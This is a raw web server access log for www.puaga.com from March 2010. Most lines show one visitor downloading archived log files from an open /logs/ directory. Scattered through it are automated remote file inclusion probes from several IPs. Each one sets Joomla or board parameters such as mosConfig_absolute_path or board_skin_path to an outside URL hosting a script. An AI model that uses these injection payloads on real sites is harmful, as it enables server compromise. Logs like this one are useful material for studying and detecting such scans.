89.180.166.3 - - [07/Mar/2010:04:00:13 -0800] "GET /logs/?N=D HTTP/1.1" 200 4799 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:14 -0800] "GET /logs/?M=A HTTP/1.1" 200 4942 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:14 -0800] "GET /logs/?S=A HTTP/1.1" 200 4942 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:14 -0800] "GET /logs/?D=A HTTP/1.1" 200 4942 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:15 -0800] "GET /logs/access.log HTTP/1.1" 200 936 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:15 -0800] "GET / HTTP/1.1" 200 3642 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:17 -0800] "GET /logs/access_100210.log HTTP/1.1" 206 545446 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:18 -0800] "GET /logs/access_100208.log HTTP/1.1" 206 862716 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:18 -0800] "GET /logs/access_100209.log HTTP/1.1" 206 793880 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:19 -0800] "GET /logs/access_100207.log HTTP/1.1" 206 883893 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:21 -0800] "GET /logs/access_100210.log HTTP/1.1" 206 1090894 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:21 -0800] "GET /logs/access_100210.log HTTP/1.1" 206 1310720 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:21 -0800] "GET /logs/access_100210.log HTTP/1.1" 200 1245184 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:22 -0800] "GET /logs/access_100207.log HTTP/1.1" 200 1572864 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:22 -0800] "GET /logs/access_100208.log HTTP/1.1" 200 1703936 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:22 -0800] "GET /logs/access_100209.log HTTP/1.1" 200 1507328 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:24 -0800] "GET /logs/access_100211.log HTTP/1.1" 206 913634 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:25 -0800] "GET /logs/access_100213.log HTTP/1.1" 206 749241 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:25 -0800] "GET /logs/access_100212.log HTTP/1.1" 206 825205 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:26 -0800] "GET /logs/access_100212.log HTTP/1.1" 200 1638400 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:27 -0800] "GET /logs/access_100211.log HTTP/1.1" 200 1703936 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:28 -0800] "GET /logs/access_100214.log HTTP/1.1" 206 965182 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
195.190.166.35 - - [07/Mar/2010:04:00:29 -0800] "GET /logs/access_100224.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:29 -0800] "GET /logs/access_100214.log HTTP/1.1" 200 1769472 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:30 -0800] "GET /logs/access_100215.log HTTP/1.1" 206 862786 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:31 -0800] "GET /logs/access_100215.log HTTP/1.1" 200 1725574 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:31 -0800] "GET /logs/access_100213.log HTTP/1.1" 206 1441792 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:31 -0800] "GET /logs/access_100213.log HTTP/1.1" 200 1376256 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:32 -0800] "GET /logs/access_100216.log HTTP/1.1" 206 723981 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:33 -0800] "GET /logs/access_100216.log HTTP/1.1" 200 1447964 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:34 -0800] "GET /logs/access_100217.log HTTP/1.1" 206 796800 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:35 -0800] "GET /logs/access_100218.log HTTP/1.1" 206 732064 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:36 -0800] "GET /logs/access_100217.log HTTP/1.1" 200 1593602 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:37 -0800] "GET /logs/access_100218.log HTTP/1.1" 200 1464129 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:38 -0800] "GET /logs/access_100219.log HTTP/1.1" 206 1108708 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:38 -0800] "GET /logs/access_100213.log HTTP/1.1" 206 1441792 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:40 -0800] "GET /logs/access_100220.log HTTP/1.1" 206 708721 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:40 -0800] "GET /logs/access_100221.log HTTP/1.1" 206 764661 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:41 -0800] "GET /logs/access_100222.log HTTP/1.1" 206 702853 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:41 -0800] "GET /logs/access_100219.log HTTP/1.1" 200 1900544 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:42 -0800] "GET /logs/access_100219.log HTTP/1.1" 206 1966080 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
121.119.192.41 - - [07/Mar/2010:04:00:43 -0800] "GET /logs/access_100128.log//delete_all.php?board_skin_path=http://webshop.budapestbamako.hu/webshop_en/cache/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.119.192.41 - - [07/Mar/2010:04:00:43 -0800] "GET /delete_all.php?board_skin_path=http://webshop.budapestbamako.hu/webshop_en/cache/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.119.192.41 - - [07/Mar/2010:04:00:43 -0800] "GET /logs//delete_all.php?board_skin_path=http://webshop.budapestbamako.hu/webshop_en/cache/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:43 -0800] "GET /logs/access_100219.log HTTP/1.1" 206 1835008 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:44 -0800] "GET /logs/access_100220.log HTTP/1.1" 200 1417444 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:44 -0800] "GET /logs/access_100222.log HTTP/1.1" 200 1405708 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:44 -0800] "GET /logs/access_100221.log HTTP/1.1" 200 1441792 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:45 -0800] "GET /logs/access_100224.log HTTP/1.1" 206 694608 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:47 -0800] "GET /logs/access_100223.log HTTP/1.1" 206 1168886 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:48 -0800] "GET /logs/access_100224.log HTTP/1.1" 200 1389217 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:04:00:49 -0800] "GET /logs/access_100128.log%20%20/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:49 -0800] "GET /logs/access_100223.log HTTP/1.1" 206 1966080 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
121.119.192.41 - - [07/Mar/2010:04:00:49 -0800] "GET /delete_all.php?board_skin_path=http://webshop.budapestbamako.hu/webshop_en/cache/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.119.192.41 - - [07/Mar/2010:04:00:49 -0800] "GET /logs//delete_all.php?board_skin_path=http://webshop.budapestbamako.hu/webshop_en/cache/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.119.192.41 - - [07/Mar/2010:04:00:49 -0800] "GET /logs/access_100128.log//delete_all.php?board_skin_path=http://webshop.budapestbamako.hu/webshop_en/cache/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:50 -0800] "GET /logs/access_100225.log HTTP/1.1" 206 628559 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:51 -0800] "GET /logs/access_100226.log HTTP/1.1" 206 740174 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:52 -0800] "GET /logs/access_100225.log HTTP/1.1" 206 1257119 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:53 -0800] "GET /logs/access_100225.log HTTP/1.1" 200 1441792 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:53 -0800] "GET /logs/access_100225.log HTTP/1.1" 206 1507328 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:54 -0800] "GET /logs/access_100223.log HTTP/1.0" 200 1835008 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:55 -0800] "GET /logs/access_100227.log HTTP/1.1" 206 739715 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:55 -0800] "GET /logs/access_100226.log HTTP/1.1" 200 1480350 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:57 -0800] "GET /logs/access_100228.log HTTP/1.1" 206 618144 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:57 -0800] "GET /logs/access_100227.log HTTP/1.1" 200 1479431 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:57 -0800] "GET /logs/access_100301.log HTTP/1.1" 206 655096 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:58 -0800] "GET /logs/access_100228.log HTTP/1.1" 200 1236289 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:59 -0800] "GET /logs/access_100301.log HTTP/1.1" 200 1310194 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:59 -0800] "GET /logs/access_100302.log HTTP/1.1" 206 688941 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:00:59 -0800] "GET /logs/access_100223.log HTTP/1.1" 206 1900544 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:01:00 -0800] "GET /logs/access_100303.log HTTP/1.1" 206 704964 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:01:01 -0800] "GET /logs/access_100304.log HTTP/1.1" 206 671343 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:01:01 -0800] "GET /logs/access_100302.log HTTP/1.1" 200 1377884 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:01:02 -0800] "GET /logs/access_100305.log HTTP/1.1" 206 693641 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:01:02 -0800] "GET /logs/access_100303.log HTTP/1.1" 200 1409930 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:01:03 -0800] "GET /logs/access_100306.log HTTP/1.1" 206 622458 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:01:04 -0800] "GET /logs/access_100305.log HTTP/1.1" 200 1387284 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:01:05 -0800] "GET /logs/access_100304.log HTTP/1.1" 200 1342688 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:01:06 -0800] "GET /logs/access_100306.log HTTP/1.1" 200 1244918 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
87.239.23.19 - - [07/Mar/2010:04:01:10 -0800] "GET /search.php?board_skin_path=http://www.emotions.com.mx/libreria/joomla??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [07/Mar/2010:04:01:10 -0800] "GET /logs//search.php?board_skin_path=http://www.emotions.com.mx/libreria/joomla??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [07/Mar/2010:04:01:10 -0800] "GET /logs/access_100225.log//search.php?board_skin_path=http://www.emotions.com.mx/libreria/joomla??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.150.205.156 - - [07/Mar/2010:04:01:31 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Avant Browser (http://www.avantbrowser.com)" "www.puaga.com"
219.150.205.156 - - [07/Mar/2010:04:01:31 -0800] "GET /logs/access_100217.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Avant Browser (http://www.avantbrowser.com)" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:04:01:41 -0800] "GET /logs/access_100211.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:01:49 -0800] "GET /logs/scripts.log HTTP/1.1" 200 19202048 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
219.150.205.155 - - [07/Mar/2010:04:01:53 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Avant Browser (http://www.avantbrowser.com)" "www.puaga.com"
219.150.205.156 - - [07/Mar/2010:04:01:54 -0800] "GET /logs/access_100222.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Avant Browser (http://www.avantbrowser.com)" "www.puaga.com"
219.150.205.155 - - [07/Mar/2010:04:01:54 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Avant Browser (http://www.avantbrowser.com)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:01:57 -0800] "GET /logs/scripts.log HTTP/1.1" 206 18743296 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:02:00 -0800] "GET /logs/scripts.log HTTP/1.1" 206 4063232 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:02:01 -0800] "GET /logs/scripts.log HTTP/1.1" 206 15532032 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:02:04 -0800] "GET /logs/scripts.log HTTP/1.1" 206 2276092 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:02:05 -0800] "GET /logs/scripts.log HTTP/1.1" 206 1966080 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:02:05 -0800] "GET /logs/scripts.log HTTP/1.1" 206 1441792 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
